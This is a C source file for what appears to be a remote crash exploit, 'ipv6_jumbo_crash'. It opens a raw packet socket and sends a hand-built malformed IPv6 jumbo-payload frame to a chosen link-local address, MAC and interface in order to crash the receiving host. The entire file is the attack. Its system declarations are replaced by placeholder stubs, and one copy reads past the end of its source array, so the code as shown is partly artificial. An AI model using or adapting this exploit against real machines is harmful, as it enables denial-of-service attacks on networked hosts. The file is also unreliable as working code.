
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_ll {int sll_halen; int sll_pkttype; int sll_hatype; int sll_ifindex; int sll_protocol; int sll_family; } ;
struct sockaddr {int dummy; } ;
struct ethhdr {int h_proto; } ;
typedef int socket_address ;


 int AF_PACKET ;
 int ARPHRD_ETHER ;
 int ETH_ALEN ;
 int ETH_P_ALL ;
 int ETH_P_IP ;
 int MY_FRAME_LEN ;
 int PACKET_OTHERHOST ;
 int PF_PACKET ;
 int SOCK_RAW ;
 int exit (int) ;
 int htons (int ) ;
 int if_nametoindex (unsigned char*) ;
 scalar_t__ malloc (int ) ;
 int memcpy (void*,unsigned char*,int) ;
 int printf (char*,...) ;
 unsigned char* resolve6 (char*) ;
 int sendto (int,void*,int ,int ,struct sockaddr*,int) ;
 int socket (int ,int ,int ) ;
 int sscanf (char*,char*,unsigned int*,unsigned int*,unsigned int*,unsigned int*,unsigned int*,unsigned int*) ;

int main(int argc, char *argv[]) {

 if (argc < 4) {
  printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3> <00:11:22:33:44:55> <eth0>\n");
  exit(1);
 }


 unsigned char *dest_ip = resolve6(argv[1]);


 unsigned char dest_mac[7];
 sscanf(argv[2], "%x:%x:%x:%x:%x:%x",
   (unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1],
   (unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3],
   (unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]);


 unsigned char *iface;
 iface = argv[3];


 void *buffer = (void*)malloc(MY_FRAME_LEN);


 unsigned char *etherhead = buffer;
 struct ethhdr *eh = (struct ethhdr *)etherhead;


 unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 };
 unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02};


 int s;
 s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
 if (s < 0) {
  printf("cannot create socket: [%d]\n",s);
  exit(1);
 }


 struct sockaddr_ll socket_address;
 socket_address.sll_family = PF_PACKET;
 socket_address.sll_protocol = htons(ETH_P_IP);
 socket_address.sll_ifindex = if_nametoindex(iface);
 socket_address.sll_hatype = ARPHRD_ETHER;
 socket_address.sll_pkttype = PACKET_OTHERHOST;
 socket_address.sll_halen = ETH_ALEN;


 memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN);
 memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN);
 eh->h_proto = 0xdd86;


 unsigned char bad_buffer[] = {
  0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 };

 memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN);


 memcpy((void*)(buffer+22), (void*)src_ip, 16);
 memcpy((void*)(buffer+38), dest_ip, 16);


 int send_result = 0;
 send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address));
 if (send_result == -1) {
  printf("could not send frame: [%d]\n", send_result);
  exit(1);
 }
 else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]);

 return 0;
}
